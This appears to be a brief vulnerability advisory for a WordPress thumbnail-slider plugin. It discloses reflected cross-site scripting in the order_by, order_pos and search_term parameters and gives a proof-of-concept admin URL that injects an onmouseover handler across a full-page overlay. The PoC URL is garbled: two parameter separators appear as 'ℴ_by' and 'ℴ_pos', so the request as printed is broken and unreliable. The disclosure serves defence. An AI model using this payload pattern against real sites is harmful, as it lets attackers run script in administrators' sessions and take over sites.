The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting vulnerability which could be used against high privilege users such as admin.
Make a logged in admin open: GET /wp-admin/admin.php?page=responsive_thumbnail_slider_image_managementℴ_by=titleℴ_pos=uqxt1%22%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20cxz0m Affected parameters: order_by, order_pos, and search_term